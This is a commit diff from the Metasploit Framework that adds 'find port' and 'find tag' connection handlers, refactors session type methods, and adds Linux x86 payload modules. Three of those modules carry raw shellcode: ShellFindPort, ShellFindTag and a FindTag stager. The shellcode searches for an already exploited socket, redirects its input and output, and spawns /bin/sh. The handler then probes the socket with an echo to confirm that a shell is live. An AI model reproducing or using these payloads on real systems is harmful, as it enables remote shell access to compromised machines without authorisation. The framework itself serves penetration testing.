find port/tag stagers
git-svn-id: file:///home/svn/incoming/trunk@2799 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
681eac7580
commit
c494a71957
|
@ -25,12 +25,16 @@ class CommandShell
|
|||
#
|
||||
include Msf::Session::Provider::SingleCommandShell
|
||||
|
||||
def self.type
|
||||
"shell"
|
||||
end
|
||||
|
||||
def desc
|
||||
"Command shell"
|
||||
end
|
||||
|
||||
def type
|
||||
"shell"
|
||||
self.class.type
|
||||
end
|
||||
|
||||
#
|
||||
|
|
|
@ -36,6 +36,10 @@ class Meterpreter < Rex::Post::Meterpreter::Client
|
|||
self.console = Rex::Post::Meterpreter::Ui::Console.new(self)
|
||||
end
|
||||
|
||||
def self.type
|
||||
"meterpreter"
|
||||
end
|
||||
|
||||
##
|
||||
#
|
||||
# Msf::Session overrides
|
||||
|
@ -47,7 +51,7 @@ class Meterpreter < Rex::Post::Meterpreter::Client
|
|||
end
|
||||
|
||||
def type
|
||||
"meterpreter"
|
||||
self.class.type
|
||||
end
|
||||
|
||||
##
|
||||
|
|
|
@ -0,0 +1,116 @@
|
|||
module Msf
|
||||
module Handler
|
||||
|
||||
###
|
||||
#
|
||||
# FindPort
|
||||
# --------
|
||||
#
|
||||
# This handlers implements port-based findsock handling.
|
||||
#
|
||||
###
|
||||
module FindPort
|
||||
|
||||
include Msf::Handler
|
||||
|
||||
def self.handler_type
|
||||
return "find_port"
|
||||
end
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::CPORT(rand(64000) + 1024),
|
||||
], Msf::Handler::FindPort)
|
||||
end
|
||||
|
||||
#
|
||||
# Check to see if there's a shell on the supplied sock. This check
|
||||
# currently only works for shells.
|
||||
#
|
||||
def handler(sock)
|
||||
_find_prefix(sock)
|
||||
|
||||
# Flush the receive buffer
|
||||
sock.get(1)
|
||||
|
||||
# If this is a multi-stage payload, then we just need to blindly
|
||||
# transmit the stage and create the session, hoping that it works.
|
||||
if (self.payload_type != Msf::Payload::Type::Single)
|
||||
handle_connection(sock)
|
||||
# Otherwise, check to see if we found a session
|
||||
else
|
||||
create_session(sock)
|
||||
end
|
||||
|
||||
return self._handler_return_value
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
#
|
||||
# Prefix to the stage if necessary.
|
||||
#
|
||||
def _find_prefix(sock)
|
||||
end
|
||||
|
||||
#
|
||||
# Wrapper to create session that makes sure we actually have a session to
|
||||
# create...
|
||||
#
|
||||
def create_session(sock)
|
||||
go = true
|
||||
|
||||
# Give the payload a chance to run
|
||||
Rex::ThreadSafe.sleep(1.5)
|
||||
|
||||
# This is a hack. If the session is a shell, we check to see if it's
|
||||
# functional by sending an echo which tells us whether or not we're good
|
||||
# to go.
|
||||
if (self.session.type == 'shell')
|
||||
go = _check_shell(sock)
|
||||
else
|
||||
print_status("Trying to use connection...")
|
||||
end
|
||||
|
||||
# If we're good to go, create the session.
|
||||
rv = (go == true) ? super : nil
|
||||
|
||||
if (rv)
|
||||
self._handler_return_value = Claimed
|
||||
end
|
||||
|
||||
return rv
|
||||
end
|
||||
|
||||
#
|
||||
# Checks to see if a shell has been allocated on the connection. This is
|
||||
# only done for payloads that use the CommandShell session.
|
||||
#
|
||||
def _check_shell(sock)
|
||||
ebuf = Rex::Text.rand_text_alphanumeric(16)
|
||||
|
||||
# Check to see if the shell exists
|
||||
sock.put("echo #{ebuf}\n")
|
||||
|
||||
# Try to read a response
|
||||
rbuf = sock.get(3)
|
||||
|
||||
# If it contains our string, then we rock
|
||||
if (rbuf =~ /#{ebuf}/)
|
||||
print_status("Found shell...")
|
||||
|
||||
return true
|
||||
else
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
attr_accessor :_handler_return_value
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -0,0 +1,53 @@
|
|||
require 'msf/core/handler/find_port'
|
||||
|
||||
module Msf
|
||||
module Handler
|
||||
|
||||
###
|
||||
#
|
||||
# FindTag
|
||||
# -------
|
||||
#
|
||||
# This handlers implements tag-based findsock handling.
|
||||
#
|
||||
###
|
||||
module FindTag
|
||||
|
||||
include FindPort
|
||||
|
||||
def self.handler_type
|
||||
return "find_tag"
|
||||
end
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('TAG', [ true, "The four byte tag to signify the connection.", "msf!" ])
|
||||
], Msf::Handler::FindTag)
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
#
|
||||
# Prefix the stage with this...
|
||||
#
|
||||
def _find_prefix(sock)
|
||||
self.stage_prefix = _find_tag
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the tag we'll be using.
|
||||
#
|
||||
def _find_tag
|
||||
tag = (datastore['TAG'] || "msf!")
|
||||
tag += ("\x01" * (tag.length - 4))
|
||||
|
||||
return tag[0, 4]
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -52,8 +52,8 @@ module Msf::Payload::Stager
|
|||
substitute_vars(p, stage_offsets) if (stage_offsets)
|
||||
|
||||
# Prefix to the stage with whatever may be required and then rock it.
|
||||
p = (stage_prefix || '') + p
|
||||
|
||||
p = (self.stage_prefix || '') + p
|
||||
|
||||
print_status("Sending stage (#{p.length} bytes)")
|
||||
|
||||
# Send the stage
|
||||
|
|
|
@ -52,6 +52,11 @@ module Session
|
|||
require 'msf/core/session/provider/multi_command_execution'
|
||||
require 'msf/core/session/provider/single_command_shell'
|
||||
require 'msf/core/session/provider/multi_command_shell'
|
||||
|
||||
def self.type
|
||||
"unknown"
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the session's name if it's been assigned one, otherwise
|
||||
# the sid is returned.
|
||||
|
|
|
@ -0,0 +1,44 @@
|
|||
require 'msf/core'
|
||||
require 'msf/core/handler/find_port'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
|
||||
module Msf
|
||||
module Payloads
|
||||
module Singles
|
||||
module Linux
|
||||
module X86
|
||||
|
||||
module ShellFindPort
|
||||
|
||||
include Msf::Payload::Single
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell, Find Port Inline',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Spawn a shell on an established connection',
|
||||
'Author' => 'vlad902',
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::FindPort,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'CPORT' => [ 26, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x31\xd2\x52\x89\xe5\x6a\x07\x5b\x6a\x10\x54\x55" +
|
||||
"\x52\x89\xe1\xff\x01\x6a\x66\x58\xcd\x80\x66\x81" +
|
||||
"\x7d\x02\x11\x5c\x75\xf1\x5b\x6a\x02\x59\xb0\x3f" +
|
||||
"\xcd\x80\x49\x79\xf9\x52\x68\x2f\x2f\x73\x68\x68" +
|
||||
"\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b" +
|
||||
"\xcd\x80"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end end end end end
|
|
@ -0,0 +1,52 @@
|
|||
require 'msf/core'
|
||||
require 'msf/core/handler/find_tag'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
|
||||
module Msf
|
||||
module Payloads
|
||||
module Singles
|
||||
module Linux
|
||||
module X86
|
||||
|
||||
module ShellFindTag
|
||||
|
||||
include Msf::Payload::Single
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell, Find Tag Inline',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Spawn a shell on an established connection (proxy/nat safe)',
|
||||
'Author' => 'skape',
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::FindTag,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'TAG' => [ 0x1a, 'RAW' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x31\xdb\x53\x89\xe6\x6a\x40\xb7\x0a\x53\x56\x53\x89\xe1\x86\xfb" +
|
||||
"\x66\xff\x01\x6a\x66\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75\xf0" +
|
||||
"\x5f\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a\x0b" +
|
||||
"\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52" +
|
||||
"\x53\x89\xe1\xcd\x80"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
#
|
||||
# Ensures the setting of TAG to a four byte value
|
||||
#
|
||||
def generate
|
||||
datastore['TAG'] = _find_tag
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end end end end end
|
|
@ -0,0 +1,47 @@
|
|||
require 'msf/core'
|
||||
require 'msf/core/handler/find_tag'
|
||||
|
||||
module Msf
|
||||
module Payloads
|
||||
module Stagers
|
||||
module Linux
|
||||
module X86
|
||||
|
||||
###
|
||||
#
|
||||
# FindTag
|
||||
# -------
|
||||
#
|
||||
# Linux find tag stager.
|
||||
#
|
||||
###
|
||||
module FindTag
|
||||
|
||||
include Msf::Payload::Stager
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Find Tag Stager',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Use an established connection',
|
||||
'Author' => 'skape',
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Handler' => Msf::Handler::FindTag,
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'TAG' => [ 0x1a, 'RAW' ],
|
||||
},
|
||||
'Payload' =>
|
||||
"\x31\xdb\x53\x89\xe6\x6a\x40\xb7\x0a\x53\x56\x53\x89\xe1\x86\xfb" +
|
||||
"\x66\xff\x01\x6a\x66\x58\xcd\x80\x81\x3e\x6d\x73\x66\x21\x75\xf0" +
|
||||
"\x5f\xfc\xad\xff\xe6"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end end end end end
|
Loading…
Reference in New Issue